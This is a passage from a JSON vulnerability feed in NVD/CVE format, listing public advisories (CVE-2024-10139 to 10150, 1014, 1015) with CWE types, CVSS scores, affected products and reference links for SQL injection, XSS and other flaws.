"ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://code-projects.org/", "name" : "https://code-projects.org/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://gist.github.com/higordiego/26694ace59cbc1e1f8366bef96953569", "name" : "https://gist.github.com/higordiego/26694ace59cbc1e1f8366bef96953569", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280926", "name" : "VDB-280926 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.280926", "name" : "VDB-280926 | code-projects Pharmacy Management System add_new_purchase.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.425283", "name" : "Submit #425283 | code-projects Pharmacy Management System 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical has been found in code-projects Pharmacy Management System 1.0. Affected is an unknown function of the file /add_new_purchase.php?action=is_supplier. The manipulation of the argument name leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:pharmacy_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-19T13:15Z", "lastModifiedDate" : "2024-10-22T14:16Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10139", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://code-projects.org/", "name" : "https://code-projects.org/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://gist.github.com/higordiego/155be99b5314d97b276a7b30b9e6dec0", "name" : "https://gist.github.com/higordiego/155be99b5314d97b276a7b30b9e6dec0", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280927", "name" : "VDB-280927 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.280927", "name" : "VDB-280927 | code-projects Pharmacy Management System add_new_supplier.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.425285", "name" : "Submit #425285 | code-projects Pharmacy Management System 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in code-projects Pharmacy Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /add_new_supplier.php. The manipulation of the argument name leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:pharmacy_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-19T14:15Z", "lastModifiedDate" : "2024-10-22T14:18Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1014", "ASSIGNER" : "cve-coordination@incibe.es" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-400" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.hackplayers.com/2024/01/cve-2024-1014-and-cve-2024-1015.html", "name" : "https://www.hackplayers.com/2024/01/cve-2024-1014-and-cve-2024-1015.html", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-se-elektronic-gmbh-products", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-se-elektronic-gmbh-products", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.hackplayers.com/2024/01/cve-2024-1014-and-cve-2024-1015.html", "name" : "https://www.hackplayers.com/2024/01/cve-2024-1014-and-cve-2024-1015.html", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-se-elektronic-gmbh-products", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-se-elektronic-gmbh-products", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Uncontrolled resource consumption vulnerability in SE-elektronic GmbH E-DDC3.3 affecting versions 03.07.03 and higher. An attacker could interrupt the availability of the administration panel by sending multiple ICMP packets." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:se-elektronic:e-ddc3.3_firmware:03.07.03:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:se-elektronic:e-ddc3.3:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-29T14:15Z", "lastModifiedDate" : "2025-01-03T19:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10140", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://code-projects.org/", "name" : "https://code-projects.org/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://gist.github.com/higordiego/b03bc3a330374a0581e51891d6105ed2", "name" : "https://gist.github.com/higordiego/b03bc3a330374a0581e51891d6105ed2", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280928", "name" : "VDB-280928 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.280928", "name" : "VDB-280928 | code-projects Pharmacy Management System manage_supplier.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.425348", "name" : "Submit #425348 | code-projects Pharmacy Management System 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in code-projects Pharmacy Management System 1.0. Affected by this issue is some unknown functionality of the file /manage_supplier.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:pharmacy_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-19T15:15Z", "lastModifiedDate" : "2024-10-22T14:19Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10141", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-Other" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jsbroks/coco-annotator/issues/626", "name" : "https://github.com/jsbroks/coco-annotator/issues/626", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Third Party Advisory" ] }, { "url" : "https://github.com/jsbroks/coco-annotator/issues/626#issue-2582440109", "name" : "https://github.com/jsbroks/coco-annotator/issues/626#issue-2582440109", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280929", "name" : "VDB-280929 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.280929", "name" : "VDB-280929 | jsbroks COCO Annotator Session predictable state", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.422713", "name" : "Submit #422713 | jsbroks coco-annotator v0.11.1 Manage User Sessions", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as problematic, was found in jsbroks COCO Annotator 0.11.1. This affects an unknown part of the component Session Handler. The manipulation of the argument SECRET_KEY leads to predictable from observable state. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:jsbroks:coco_annotator:0.11.1:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "HIGH", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.1, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-19T15:15Z", "lastModifiedDate" : "2024-10-23T20:27Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10142", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://code-projects.org/", "name" : "https://code-projects.org/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://github.com/WrongDish/CVE/blob/main/xss6.md", "name" : "https://github.com/WrongDish/CVE/blob/main/xss6.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280930", "name" : "VDB-280930 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.280930", "name" : "VDB-280930 | code-projects Blood Bank System viewrequest.php cross site scripting", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.425362", "name" : "Submit #425362 | code-projects blood-bank-system-in-php v1.0 Storage Cross Site Scripting", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in code-projects Blood Bank System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /viewrequest.php. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:blood_bank_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-19T17:15Z", "lastModifiedDate" : "2024-10-22T18:11Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10143", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/b5fd7a3e-33e4-4c73-a581-881f063855b0/", "name" : "https://wpscan.com/vulnerability/b5fd7a3e-33e4-4c73-a581-881f063855b0/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/b5fd7a3e-33e4-4c73-a581-881f063855b0/", "name" : "https://wpscan.com/vulnerability/b5fd7a3e-33e4-4c73-a581-881f063855b0/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The MB Custom Post Types & Custom Taxonomies WordPress plugin before 2.7.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:deluxeblogtips:mb_custom_post_types_\\&_custom_taxonomies:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.7.7", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2025-05-15T20:15Z", "lastModifiedDate" : "2025-06-12T14:12Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10144", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/a83521d3-0aba-493d-8dec-e764277e69b8/", "name" : "https://wpscan.com/vulnerability/a83521d3-0aba-493d-8dec-e764277e69b8/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/a83521d3-0aba-493d-8dec-e764277e69b8/", "name" : "https://wpscan.com/vulnerability/a83521d3-0aba-493d-8dec-e764277e69b8/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Photo Gallery, Images, Slider in Rbs Image Gallery WordPress plugin before 3.2.22 does not sanitise and escape some of its settings, which could allow high privilege users such as contributor to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:robosoft:robo_gallery:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "3.2.22", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2025-05-15T20:15Z", "lastModifiedDate" : "2025-06-04T20:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10145", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/b9e2381b-3ea0-48fa-bd9c-4181ddf36389/", "name" : "https://wpscan.com/vulnerability/b9e2381b-3ea0-48fa-bd9c-4181ddf36389/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/b9e2381b-3ea0-48fa-bd9c-4181ddf36389/", "name" : "https://wpscan.com/vulnerability/b9e2381b-3ea0-48fa-bd9c-4181ddf36389/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Hubbub Lite WordPress plugin before 1.34.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:devpups:social_pug:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.34.4", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2025-05-15T20:15Z", "lastModifiedDate" : "2025-06-04T20:35Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10146", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/9ee74a0f-83ff-4c15-a114-f8f6baab8bf5/", "name" : "https://wpscan.com/vulnerability/9ee74a0f-83ff-4c15-a114-f8f6baab8bf5/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Simple File List WordPress plugin before 6.1.13 does not sanitise and escape a generated URL before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against admins." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:simplefilelist:simple_file_list:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "6.1.13", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-11-14T06:15Z", "lastModifiedDate" : "2025-05-15T16:29Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10147", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b1ed1ef4-8867-499b-8f73-296280573462?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b1ed1ef4-8867-499b-8f73-296280573462?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://wordpress.org/plugins/steel/#developers", "name" : "https://wordpress.org/plugins/steel/#developers", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Steel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's btn shortcode in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-11-16T04:15Z", "lastModifiedDate" : "2024-11-18T17:11Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10148", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/84ef25b6-8119-41e5-9959-ccdfb9893e75?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/84ef25b6-8119-41e5-9959-ccdfb9893e75?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://wordpress.org/plugins/wp-awesome-buttons/#developers", "name" : "https://wordpress.org/plugins/wp-awesome-buttons/#developers", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Awesome buttons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's btn2 shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:sohelwpexpert:awesome_buttons:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-25T07:15Z", "lastModifiedDate" : "2024-11-06T16:02Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10149", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/1619dc4b-4e5e-4b82-820b-3c4e732db3ad/", "name" : "https://wpscan.com/vulnerability/1619dc4b-4e5e-4b82-820b-3c4e732db3ad/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/1619dc4b-4e5e-4b82-820b-3c4e732db3ad/", "name" : "https://wpscan.com/vulnerability/1619dc4b-4e5e-4b82-820b-3c4e732db3ad/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Social Slider Feed WordPress plugin before 2.2.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:cm-wp:social_slider_widget:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.2.9", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2025-05-15T20:15Z", "lastModifiedDate" : "2025-06-09T18:20Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1015", "ASSIGNER" : "cve-coordination@incibe.es" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-94" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.hackplayers.com/2024/01/cve-2024-1014-and-cve-2024-1015.html", "name" : "https://www.hackplayers.com/2024/01/cve-2024-1014-and-cve-2024-1015.html", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-se-elektronic-gmbh-products", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-se-elektronic-gmbh-products", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.hackplayers.com/2024/01/cve-2024-1014-and-cve-2024-1015.html", "name" : "https://www.hackplayers.com/2024/01/cve-2024-1014-and-cve-2024-1015.html", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-se-elektronic-gmbh-products", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-se-elektronic-gmbh-products", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : " Remote command execution vulnerability in SE-elektronic GmbH E-DDC3.3 affecting versions 03.07.03 and higher. An attacker could send different commands from the operating system to the system via the web configuration functionality of the device." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:se-elektronic:e-ddc3.3_firmware:03.07.03:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:se-elektronic:e-ddc3.3:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-29T14:15Z", "lastModifiedDate" : "2025-01-03T19:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10150", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wordpress.org/plugins/bamazoo-button-generator/#developers", "name" : "https://wordpress.org/plugins/bamazoo-button-generator/#developers", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/543507a1-02de-417f-a742-7764465987b2?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/543507a1-02de-417f-a742-7764465987b2?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Bamazoo – Button Generator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's dgs shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, 